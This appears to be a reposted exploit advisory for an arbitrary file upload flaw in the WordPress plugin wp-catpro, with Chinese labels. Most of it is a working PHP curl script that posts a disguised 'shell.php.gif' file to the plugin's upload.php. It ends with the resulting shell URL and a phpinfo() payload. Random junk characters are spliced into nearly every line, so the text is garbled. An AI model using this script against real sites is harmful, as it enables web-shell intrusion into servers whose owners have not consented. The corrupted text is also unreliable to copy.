Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability! v% A% \$ U; X2 R
#-----------------------------------------------------------------------/ Q8 e9 n% q4 q; j7 V
+ R9 P8 }8 x4 Q% s/ R作者 => Zikou-16
- [, k+ ~: W9 t& I! }* f邮箱 => zikou16x@gmail.com' R. c* d% S2 G" \
测试系统 : Windows 7 , Backtrack 5r3
; Z) e) b; s1 E! q: T下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
8 I/ n/ Y# }2 D4 O3 C4 _' @2 C! H####* z$ @7 c7 |9 }" o
& g. ] u3 W, t/ V#=> Exploit 信息:2 r0 `. w F/ D* Y+ c& {
------------------4 {/ w- h& A! Z4 s5 k
# 攻击者可以上传 file/shell.php.gif" t! t0 |% C' e) a/ s: f
# ("jpg", "gif", "png") // Allowed file extensions; F9 L' a$ c3 \# |" k# m
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)5 K+ u) m; X$ F" r
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ I+ j9 L- D6 f4 K; C: ^9 Q------------------
$ H, q1 D4 }/ M* _: x$ ]$ f
7 T; w! b$ c" s& h3 C#=> Exploit
# [% \ p% ~" r& v-----------
- O* ^7 V, X1 H( O<?php
+ J4 n9 P$ O0 p4 y' H. |: {" N % Z2 W0 i& c1 T# P6 [! v4 N+ d6 l+ w/ o
$uploadfile="zik.php.gif";- A% g+ x8 R1 [8 ^4 M7 {( Q
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
' e. _" l9 j# D0 Q5 x" P/ w: xcurl_setopt($ch, CURLOPT_POST, true);. d) q# R. d; w9 V$ @, A% }
curl_setopt($ch, CURLOPT_POSTFIELDS,
8 ^0 O& ~1 S9 G1 l# d- barray('Filedata'=>"@$uploadfile",! d' k( Z- E2 `" `
'folder'=>'/wp-content/uploads/catpro/'));3 Z, S! e l9 o4 N4 S. V
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ C6 C5 i! ^+ T7 o) C" @$postResult = curl_exec($ch);! W! ]- X4 ]4 R8 Y- u( @
curl_close($ch);
* A7 g# d' h5 S* S4 u, p& N + U: E0 I# v2 A1 [$ ^
print "$postResult";! G2 l9 m: r8 G% w" I- ~6 V) f
( _2 I$ A" ~0 W9 W6 [: f1 ^. {% \
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif* e. C& F: b5 i, Z
?>. D- b( B6 w( |$ k9 @( l/ G
<?php3 b/ k5 k# G% x! e1 x a7 k# ?* W+ z
phpinfo();2 m7 B/ U# l) G1 ~$ Z
?> |